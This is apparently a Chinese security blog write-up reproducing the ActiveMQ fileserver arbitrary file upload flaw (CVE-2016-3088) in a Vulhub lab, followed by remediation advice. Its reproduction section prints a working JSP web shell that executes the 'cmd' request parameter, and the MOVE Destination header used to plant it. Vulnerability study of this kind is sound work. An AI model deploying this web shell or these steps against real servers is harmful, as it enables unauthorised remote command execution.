ActiveMQ PUT任意文件上传漏洞复现

admin 2022年1月13日18:54:23安全文章评论16 views1170字阅读3分54秒阅读模式
1 漏洞介绍
    ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。
ActiveMQ PUT任意文件上传漏洞复现
    在Apache ActiveMQ 5.x~5.14.0版本中存在漏洞,攻击者可通过该漏洞写入JSP文件从而执行命令。

2 漏洞原理
    ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;
    admin和api都需要登录后才能使用,fileserver无需登录。
    本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。
    所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。

3 漏洞复现
(1)用Vulhub加载相关的漏洞环境
ActiveMQ PUT任意文件上传漏洞复现
(2)访问路径查看ActiveMQ的绝对路径
http://192.168.1.104:8161/admin/test/systemProperties.jsp
ActiveMQ PUT任意文件上传漏洞复现
(3)构造PUT请求上传测试文件,返回204
<%@ page import="java.io.*"%><% out.print("Hello</br>"); String strcmd=request.getParameter("cmd"); String line=null; Process p=Runtime.getRuntime().exec(strcmd); BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream())); while((line=br.readLine())!=null){ out.print(line+"</br>"); }%>
ActiveMQ PUT任意文件上传漏洞复现
(4)构造MOVE将txt内容移动到jsp中
Destination:file:///opt/activemq/webapps/api/5.jsp
ActiveMQ PUT任意文件上传漏洞复现
(5)访问jsp文件,成功执行命令。
ActiveMQ PUT任意文件上传漏洞复现

4 修复建议
  • 1. ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本
  • 2. 通过移除 confjetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能
  • 3. 打补丁
http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt

5 参考文章
https://www.cnblogs.com/huangxiaosan/p/14222694.html

原文始发于微信公众号(Reset安全):ActiveMQ PUT任意文件上传漏洞复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月13日18:54:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  ActiveMQ PUT任意文件上传漏洞复现 http://cn-sec.com/archives/735618.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: